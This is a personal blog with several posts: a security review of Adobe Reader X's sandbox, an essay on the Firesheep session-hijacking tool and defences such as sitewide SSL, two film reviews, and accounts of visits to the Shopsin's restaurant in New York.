Adobe Reader X

A few days the long awaited Adobe Reader X was released. Given that Adobe Reader and Flash have been the primary attack vector on PC’s for the last few years (with them being responsible for over 80% of attacks in 09 alone) a secure version of Reader is long overdue. It is a sad state of affairs that a PDF viewer needs a sandbox in the first place, but given the reality of the situation it is good to see Adobe finally stepping up. The question is, did they do a good job? Adobe have an atrocious track record when it comes to security, but going by their blog it seems they worked closely with experts, so hopefully it is as good as can be expected.

The initial impressions upon first using Reader X were not great. The setup file is quite larger, 35mb as compared to 26mb for 9.4. Nothing really seems to have changed except for the sandbox, and the ability to comment pdf’s built in to the reader, which I guess is nice. The toolbar seems to be using a different widget set and it now looks cartoonier, which I don’t like at all. I had originally thought the toolbar had disappeared from the browser plugin which would make it harder to navigate pages, but it is actually a minimal toolbar on autohide at the bottom of the screen. While not intuitive it is a big improvement. For some reason the installer still places a shortcut on your desktop as it has for years. I’ve never understood that, as I have no desire to stare at a grey screen.

The security changes seem interesting. The reader is now using marked as a low integrity process in addition to the sandbox, as well as having full DEP and ASLR support. There are no customization options for the sandbox that I could find, but then none are really needed. The sandbox is only for the Windows version, so OS X, Linux and Android users are still left unprotected. As per the Adobe blog post above all write attempts are sandboxed by default. This should effectively stop most drive by download attempts in their tracks. It isn’t terribly easy to tell if protected mode is on or not, requiring to view the advanced properties of the pdf you are currently viewing. It seems however Adobe is aware of this and other problems and will work towards them on future releases. I am actually having trouble finding any further detailed information on the new protected mode, as clicking on the link on the website simply shows me a nice generic image of Adobe Reader.

I often see the point come up that using an alternative PDF reader such as Foxit or Sumatra will provide better security. This is simply false. Neither Sumatra nor Foxit have DEP or ALSR support (which is trivial to implement) and act buggy if they are forced to run as a low integrity process. They also lack an equivalent to the Enhanced Security Mode present in Adobe Reader since 9.3, requiring confirmation for certain actions. PDF exploits are often reader independent, in which case Adobe Reader actually has better mitigation techniques than any other reader. The gain in security via obscurity by using these other readers is far less than the mitigations techniques present in Reader X. With the introduction of a sandbox, Adobe Reader X is clearly the most secure choice at the moment. In addition to security aspects, other readers are simply not good enough to be a replacement yet as they have problems with overly large files or lack compatibility entirely for features such as forms.

I wonder when Flash will gain a similar to sandbox, as it is another primary attack vector these days if not more so than PDFs. Flash is still being targeted such as in this recent attack yet I have no heard no plans for Adobe to make security a priority for flash as they have for Reader, which is kind of strange.

What the last few years and various PDF and Flash exploits have shown is that DAC continues to be a poor access control framework for a modern desktop environment. There is simply no reason that a program started as a user should inherit the full rights of that user. If we had an easy to use MAC implementation that was mostly transparent, than most of these exploits would not be an issue, in fact they probably would not exist due to them not being possible in the first place. It seems the industry is slowly heading in that direction and features like sandboxing and integrity levels for processes are a good start. At least they will suffice for the meantime until such a time when operating systems allow us to easily sandbox risky or untrusted applications instead of relying on each program implement their own version. In the meanwhile for applications that are not sandboxed, it is possible to do so using Sandboxie, however it is not as effective on 64bit versions of Windows due to Kernel Patch Protection. I am not aware of any sandboxing applications on OS X and of course on Linux you can use a jail or one of the main MAC implementations.

Thoughts on I love you Phillip Morris

I managed to watch I love you Phillip Morris after having it on my PC for almost a year. Not many people have heard of it due to an idiotic decision to distribute the movie. The movie is excellent with a great performance by Jim Carrey. He doesn’t tend to do comedy that often anymore and this isn’t purely a comedy, even so he shines given the chance. It’s interesting to note the comedy in this film is a lot more subtle which is always interesting to contrast to his not so subtle beginnings.

The story is basically a love story of two men who meet in jail. Ewan McGregor also does a great turn as Jim Carrey’s lover, and these two play off each other perfectly. The movie does not pay much attention to his family life before he revealed he was gay and the transition happens quite quickly in the film. Likewise the many ingenious escape attempts made by Stephen Jay Russell (played by Carrey) are not given much attention and are shown in a more comedic light. These things don’t hurt the film, but I think it would have been interesting to look at it from a more serious point of view. Then again, there are documentaries for that purpose.

It is never stated explicitly what time period the film is set in, although is appears to be late 80’s/early 90’s going by the size of the cell phones used. Another interesting thing is how the police repeatedly refer to the characters as ‘faggot’. I wonder how much that has changed, or if it is still prevalent – especially in places like Texas.

I am glad the movie brought to my attention the story of the main character, Stephen Jay Russel. I think it makes for an interesting example for an argument about the current prison system being as fucked up as it is. Yes, the guy broke the law, but he is currently serving a 144 year life sentence with 23 hours a day being in solitary. That is very obviously wrong and not at all proportionate to the crime he committed. I would question whether he should be in jail at all, given that he is obviously intelligent and could be serving society in much more beneficial ways.

The saddest thing about this movie is that it has not gotten distribution, with it being out for almost two years. The obvious reason is due to the homosexual love story. People love a good con film and a good love story so with the two combined the film should have been at least moderately popular. The film is not even overtly gay, the one gays sex scene lasts only a few seconds and is not terribly explicit. Indeed most of the film is actually romantic. Unfortunately much like the homophobic police in the movie, film distribution companies have yet to realize that sexual orientation simply shouldn’t matter.

Thoughts on Firesheep

The last week there has been a lot of discussion over the release of the Firesheep addon for Firefox. Firesheep made the news because it allows anyone to impersonate someone on the same network on the vast majority of websites on the net. This is known as session hijacking or “sidejacking”. The problem occurs because most websites only encrypt the login process which prevents people from sniffing your username and password, but they then redirect to a non-ssl site which allows people to steal your session cookie – the unique identifier that tells a site who you are after you have logged in. If someone has hijacked your session they don’t have your username and password, but will still be logged in as you.

There has been a bit of controversy over Firesheep because some people are convinced that the person who wrote the extension should be held accountable or at the least did something wrong. Nay. Those people are simply misguided. Releasing a tool like Firesheep is the essence of responsible disclosure. The generally agreed process for dealing with exploits is to contact the developer privately to work on a fix, and reveal the exploit with the fix so both the company and researcher get credit. If the developer refuses to fix the flaw, then a proof of concept exploit is released to push the developer into doing the right thing. Firesheep is simply another proof of concept exploit for a problem that has been around for many many years. It isn’t like people were not made aware at least once before.

Facebook seems to have been getting the most press, although most sites are vulnerable. Most web email services, Amazon, other social networking sites, forums….pretty much anything you can think of. The strange thing is that most people don’t seem to care. This is generally because people don’t understand the risk or think that they won’t be a target. This is why the release of something like Firesheep is a good thing, a fantastic attempt at actually illustrating the threat. No doubt its use will become more widespread and as more people start to get taken advantage of, there will be a greater push for security that will benefit everyone.

I found it interesting that somebody went to the trouble of writing FireShepherd. FireShepherd is a tool that exploits a bug in FireSheep to prevent it from working. It doesn’t accomplish anything, and will likely be rendered obsolete in the next version. If something like FireShepherd was to be useful it should pollute the waves with fake sessions, although even this would not work terribly well.

I wanted to clear up some misconceptions that have sprung up in the wake of Firesheeps release, as a lot of bad advice seems to be being given out. First of all, logging out does not automatically make you safe. Many websites do not necessarily invalidate the session upon logout, which means even if you have logged out whoever is hijacking your session can continue to do so.

You are not automatically protected by using an encrypted wireless network. WEP does not encrypt client traffic for authorized clients and besides can be cracked in seconds. WPA/2 PSK means it uses a Pre-Shared Key. This means anyone with that key can decrypt traffic for the other clients. Firesheep may not work, but it would not be difficult to adapt it to do this. Even on a wired network you may not be safe due to ARP poising or MAC address overflow attacks.

Some people have recommended using a VPN or SSH tunneling which are one of the best solutions. They are not immune however it is a whole lot less likely that someone is sniffing anything from your ISP’s connection upwards than it is that there will be some douchebag at Starbucks looking for someone to take advantage of. Either of these solutions are the best at present as they allow you to encrypt all traffic to a point where only employees or authorized personnel would have access to take advantage of your unencrypted sessions.

What most people have been suggesting is to use an extension that forces sites to use SSL all the times. The two most suggested addons are HTTPS Everywhere by the EFF and Force-TLS. NoScript also has this capability. There is a similar addon for Chrome called KB SSL Enforcer however it is quite insecure at present. Due to the subpar Chrome extensions framework every site request will be http first, so session cookies will still be leaked and can be abused.

Each of these addons make use of HSTS which rely on the server to have support. If the server does have support then the entire session can be encrypted. Unfortunately not many sites support this at present, and forcing an SSL session by rewriting http requests is not ideal. Some websites will break if you try this, such as chat no longer working in FaceBook. Some sites may not load at all as they will depend on http content for various reasons, such as hardcoded links or content from another domain. Even if a website supports wholly SSL sessions there may still be information leaks, such as AJAX requests or a fallback to HTTP happened to Google a few years ago.

The only decent solution is for websites to implement sitewide SSL . Secure cookies, and SSL for everything from the login and after. No fallback to just HTTP, at all. Of course, this approach has gotten some criticisms. People claim that SSL is too expensive, however this simply isn’t true. Google showed earlier this year that having SSL as the default option for Gmail increased server load only %1. If Google can manage this, Facebook and Amazon sure as hell can. People are saying the performance will be diminished because you can’t cache with ssl however this is false, you just have to set Cache-control: public. Then there are people who complain about needing a dedicated IP, which is also false. Basically, in this day and age, there is very little reason not to have an entire encrypted session for anything remotely valuable. It is appalling that so many companies and sites have ignored this problem for so long and I think it is great that Firesheep has brought attention to the problem, again.

Of course, I don’t expect anything to change although in another few years there will probably be a similar tool released and the discussion will start up again, at which point there truly won’t be any excuse for default non-encrypted sessions to be so prevalent.

Update – November 11th 2010

A few days after I wrote the above, a tool called BlackSheep was released which aims to help people detect someone using Firesheep on a network. The tool does as I said above, sending fake sessions and reporting when one is accessed. I haven’t looked at it in detail but I would think it could easily be mitigated either by learning to identify the type of sessions BlackSheep sends out or finding some other way to detect or disable it. This just gets into a never ending cat and mouse game all the while ignore the real problem.

I was made aware of an addon for Firefox, SSLPasswdWarning. This addon will alert you if your password or sensitive information will be transmitted over an insecure connection, so is useful in helping to determine if there is a risk or not.

Thoughts on Buried

I managed to see Buried a few days ago on the last day it was playing which I was thankful for. I had wanted to make sure I saw this movie in the cinema rather than on my laptop screen as it sounded amazing and got nothing but high praise from critics I trust. A film that was on a blacklist for many years due to being considered unfilmable had now apparently been turned into a masterpiece starring the much underrated Ryan Reynolds.

While it was enjoyable, I found it didn’t really live up to expectations. Despite most people claiming it invoked a claustrophobic feeling or tense atmosphere, I didn’t get any of that. I found it entertaining and intriguing more than anything. I’m not exactly sure why I didn’t feel tense…possibly because I expected that Paul Conroy was going to inevitably escape. The fact that didn’t happen was interesting but ultimately didn’t change anything. With this sort of movie I guess it is hard to change the expectations that the audience is going to have. Ryan Reynolds gives a great performance and while you don’t know the character very well it is trivial to identify with his plight. Things are kept interesting throughout the movie as he desperately tries to find someone to help him by calling 911, his employers, his wife, the FBI, trying to reason with his captors etc.

For a film that is entirely shot in a box the film never becomes visually boring. Everything is made visual from his calls on his phone, sources of light etc. Everything that starts happening to him is shown visually such as finding supplies, sand starting to cave in, finding an unwelcome snake sharing his space. I never once felt bored during the film at all, but at the same time I never felt that attached. I was always interested to see where the film was going but I expected it to have an atmosphere closer to The Departed or Frozen or something. Something to invoke concern and anxiousness rather than casually seeing where the story goes. I do think it is amazing that the film is shot with the character in the coffin the entire time, not leaving it once although this also results in some strange decisions. There is one point where the camera zooms out for maybe a whole minute as the coffins gets smaller and further away, which just feels out of place.

The main thing I thought about from the film was that it reminded me of how much people can suck, much like District 9 did. I can understand the position the US Government takes given what they are faced with but there is little excuse for the cold indifference and lack of concern displayed by nearly every person that he calls. Possibly the worst moment in the movie is when his employer fires him over the phone to eliminate him as a liability and then makes him participate in a recorded interview to cover their asses. It’s conduct like that that I would hope corporations’ burn for.

There were a few things that seemed strange. It is pointed out to him that he is probably only 2 or 3 feet below ground, and the coffin he is in is shown to be rather weak and poor enough to let a snake in as well a horde of sand. Given that the coffin is also large than normal, why not do your best to kick your way out? Surely with the added adrenaline breaking through a rotting poorly held together wooden box would not be that difficult? I suppose if he did this it would be the end of the movie quite quickly, although I would have liked it if he had at least tried.

I know that a lot of people were talking about the movie being an allegory for the war in Iraq, although I have to say I didn’t really see this at all. It might be there, but it could also be something that is very easy to project onto the movie. Buried is definitely an entertaining movie although I don’t think it lives up to the hype. I will be very interested to see in which direction the director Rodrigo Cortés goes next.

Shopsin’s

The last time I was in NYC one of my friends introduced me to Shopsin’s. I had never heard of this restaurant which is pretty amazing. The owner is known for having a lot of strict rules and creating hundreds of different dishes, many of which are strange combinations. The menu changes fairly frequently but it seems to be kept up to date on the website to get an idea. Some of the rules are quite interesting such as no more than a party of 3 is allowed regardless of if the restaurant is empty or not and no two people in a party may order the same dish. Some of these rules seem stupid and just to exist at the whim of the owner which is fine since it’s his place, although I can’t but help wonder at the reasoning behind them. An easy path to notoriety? Pet hates?

Apparently you really have to be aware of the rules before going in or run the risk of being sworn out and made to leave. The friend I went was on good terms with the people there so no problems, although I have heard of a family coming because the restaurant was listed in a guide book being cussed out and driven away. That is certainly an interesting stance to take…and while I understand that sentiment it doesn’t seen necessary to take it out on an unsuspecting family.

The owner, Kenny Shopsin is apparently quite famous for having outspoken views on everything which the documentary on the restaurant was meant to give a glimpse of. After watching the documentary, I really didn’t see anything particularly special about the guys views. Some of his views were certainly interesting – for instance, he considered that since he had been operating his shop at his previous location for over 30 years he has every right to dictate what the customers can and cannot do. It’s his place and he has been there for such a long time, why not? If you can work this attitude into your business model successfully, then go for it I guess. Overall the documentary isn’t that great as it doesn’t give a lot of insight into his philosophy nor highlight the interesting dishes he makes…it’s basically just watching the family for a few days. Although he has a book out which I have not read but would no doubt give a lot of insight into the man, being in his own words and all.

The dishes themselves seemed interesting however none of them seemed particular filling. A lot of the combinations seem great although you may not like one or two of the items which can be annoying as one of the rules is you can not ask to change anything on the menu. It can make choosing quite a bit longer than it already takes on such a large menu. I ended up getting the superbowl tray to try everything, which at the time consisted of coconut shrimp, 2 tacos, samosas, rice and beans, duck drumsticks and a banana and strawberry or raspberry cannoli. If I remember correctly. Certainly delicious and I would go back to sample other items, but the food is certainly not worth any insults if I were to encounter that. Looking at the current menu the superbowl tray has already changed significantly.

One thing I have wondered about is if it is inevitable that Shopsin’s will be parodied on some sitcom or worked into a drama at some stage? The infamous Soup Nazi episode of Seinfeld made Al Yeganeh’s Soup Kitchen International aware to many people whilst before it was a well known secret. Shopsin’s is somewhat similar although what with a movie and book based on the restaurant perhaps it is not such a niche thing. Perhaps the idea is considered too similar to the Soup Nazi? A place to get amazing food where the owner can be considered mean and have a lot of strange, strictly enforced rules? Surely the rules are different enough and the unique aspect of having such a great variety of ever changing dishes would allow for a fresh take on the idea? If it were to appear in a sitcom however, there is a shortage of NYC based sitcoms at present. Only 30 Rock or How I Met Your Mother would be suited and I can’t think of it working too well in either show.

Update 1 – January 27th 2011

I’m writing this slightly more than 10 days after I actually went to Shopsin’s a second time during the snow storm in NYC, but still better late than never. So, after arriving on Saturday and running into my friends and vaping for that night, we decided to go to Shopsin’s the next day. The biggest change I noticed from going there in July is it seemed to be a lot more famous now…a lot more people were walking past and talking about it or coming just to look, and there were actually lines now.

It was interesting going with my friend who is good friends with Kenny, despite being at the end of the line and all the tables seated, Kenny got an assistant to bring out a spare table so we could both sit down, skipping everyone in line. It was only then I got a sense of just how much my friend was on good terms with Kenny. It’s perhaps mean, but I couldn’t help noticing a table of 3 very large women gouging themselves, while the two largest were having trouble finishing the shortest and plumpest had already finished superbowl tray and was looking for more. Anyway. It really is good food.

They made a bowl of étouffée by mistake which my friend got for half price, while I had avocado grilled cheese, grilled tikka chicken, onion strings and chilli mac. It was quite delicious, although I had thought the price was $17 when it was actually $24. I probably would have gotten something more inventive had I realized all the lunch trays were the same price, but still, it was absolutely delicious. I hope to go back before I leave in the next few days, as it will be cheap Mexican food for the next few months after.